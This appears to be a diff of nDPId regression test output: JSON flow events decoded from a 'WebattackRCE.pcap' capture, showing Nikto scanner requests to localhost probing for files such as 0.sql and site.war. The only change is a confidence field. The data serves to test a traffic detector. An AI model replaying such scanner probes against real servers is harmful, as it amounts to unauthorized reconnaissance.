00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277336,"pkt":"AAAAAAAAAAAAAAAACABFAADFO7NAAEAGAH5\/AAABfwAAAcTQH5BUXAMIX4xO7oAYAED+uQAAAQEICp1m\/YCdZv2AR0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277337,"pkt":"AAAAAAAAAAAAAAAACABFAAC9OaFAAEAGAph\/AAABfwAAAcTSH5DijwEqjka6TYAYAED+sQAAAQEICp1m\/YGdZv2BR0VUIC8wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277339,"pkt":"AAAAAAAAAAAAAAAACABFAAC9fmNAAEAGvdV\/AAABfwAAAcTUH5Bm6EbY23UeBoAYAED+sQAAAQEICp1m\/YOdZv2DR0VUIC8wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277340,"pkt":"AAAAAAAAAAAAAAAACABFAADF759AAEAGTJF\/AAABfwAAAcTWH5AedNcrGvcoYYAYAED+uQAAAQEICp1m\/YSdZv2ER0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277342,"pkt":"AAAAAAAAAAAAAAAACABFAADFUDJAAEAG6\/5\/AAABfwAAAcTYH5DWhmiIUA3tU4AYAED+uQAAAQEICp1m\/YadZv2GR0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277343,"pkt":"AAAAAAAAAAAAAAAACABFAADA2wlAAEAGYSx\/AAABfwAAAcTaH5BjP+Ox5vZroYAYAED+tAAAAQEICp1m\/YedZv2HR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277344,"pkt":"AAAAAAAAAAAAAAAACABFAADAn6BAAEAGnJV\/AAABfwAAAcTcH5DwnKcnILktrYAYAED+tAAAAQEICp1m\/YidZv2IR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277345,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HTtAAEAGHvx\/AAABfwAAAcTeH5D3FiWCONN3YoAYAED+swAAAQEICp1m\/YmdZv2JR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 